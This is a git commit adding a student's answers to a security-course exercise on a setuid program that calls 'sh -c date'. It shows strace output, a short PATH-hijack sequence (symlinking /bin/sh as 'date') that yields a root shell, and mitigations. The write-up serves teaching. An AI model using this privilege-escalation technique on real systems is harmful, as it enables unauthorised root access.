From d7c4536c91ddd307fc9b99984ac49b5b5459b485 Mon Sep 17 00:00:00 2001
From: Camil Staps
Date: Mon, 30 Nov 2015 22:08:58 +0100
Subject: Assignment 2, 3

---
 CamilStaps-s4498062-Assignment-2/ex1/ex1.txt | 21 +++++++++++++++++++++
 1 file changed, 21 insertions(+)
 create mode 100644 CamilStaps-s4498062-Assignment-2/ex1/ex1.txt

(limited to 'CamilStaps-s4498062-Assignment-2/ex1/ex1.txt')

diff --git a/CamilStaps-s4498062-Assignment-2/ex1/ex1.txt b/CamilStaps-s4498062-Assignment-2/ex1/ex1.txt
new file mode 100644
index 0000000..28c5e20
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-2/ex1/ex1.txt
@@ -0,0 +1,21 @@
+a
+    Using strace -feprocess ./showdate we see the following interesting calls:
+        execve("/bin/sh", ["sh", "-c", "date"], [/* 37 vars */])
+        execve("/bin/date", ["date"], [/* 37 vars */])
+
+b
+    $ ln -s /bin/sh date
+    $ export PATH=.:$PATH
+    $ ./showdate
+    # id
+    uid=0(root) gid=0(root) groups=0(root),27(sudo),1001(camil)
+
+c
+    - Simply don't use execve for something as simple as this.
+    - The currently used system call is:
+        execve("/bin/sh", ["sh, "-c", "date"], [/* 37 vars */])
+      This could be changed to:
+        execve("/bin/date", ...)
+      A nonprivileged user cannot change /bin/date.
+    - Drop privileges before executing execve.
+
-- 
cgit v1.2.3